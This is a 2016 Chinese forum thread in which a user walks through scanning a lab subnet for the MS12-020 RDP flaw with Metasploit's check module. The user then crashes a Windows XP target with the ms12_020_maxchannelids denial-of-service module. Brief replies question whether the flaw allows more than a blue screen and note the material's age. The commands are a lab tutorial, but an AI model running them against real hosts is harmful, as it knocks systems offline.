请选择 进入手机版 | 继续访问电脑版
查看: 1294|回复: 3

【原创】ms12-020漏洞利用过程

[复制链接]
  • TA的每日心情
    无聊
    2016-5-21 01:26
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2016-5-21 02:31:21 | 显示全部楼层 |阅读模式
    需要kali xp靶机(如果你本机安装了metasploit,直接使用就行)

    1.1.png
    首先输入msfconsole进入msf
    接着search 漏洞编号 查看它的一个漏洞利用模块,这里有两个。
    auxiliary/scanner/rdp/ms12_020_check  侦查
    auxiliary/dos/windows/rdp/ms12_020_maxchannelids利用

    2.png
    那么先来用侦查模块看一下目标主机同网段的是否有主机存在漏洞
    use auxiliary/scanner/rdp/ms12_020_check  进入漏洞利用模块
    show options 查看需要设置的选项

    这里需要设置RHOSTS(目标网段) THREADS(线程)
    那么 set RHOSTS 192.168.75.0/24 扫描目标网段
    set THREADS 45 线程45
    run 进行扫描
    3.png
    接着开始扫描,可以看到这里出现了一个加号 后面跟着这一句(不懂可以百度翻译啊)
    接着需要用到另一个模块来进行攻击
    use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 进入利用模块
    接着 show options 查看需要设置什么
    4.png


    这里只需要给他一个地址就行 接着run 进行攻击
    5.png

    接着靶机就蓝屏了。。。。。。。。。。
    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2019-9-17 16:45
  • 签到天数: 231 天

    [LV.7]常住居民III

    发表于 2016-5-22 23:35:31 | 显示全部楼层
    这个是命令执行还是BSOD
    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2018-11-26 14:17
  • 签到天数: 77 天

    [LV.6]常住居民II

    发表于 2016-5-23 20:43:27 | 显示全部楼层
    哥们 多少年的东西了 就别挂原创了 不过还是多谢分享
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2016-10-10 18:06
  • 签到天数: 201 天

    [LV.7]常住居民III

    发表于 2016-5-24 16:34:24 | 显示全部楼层
    Sharpwinner
    啪,蓝屏了。
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表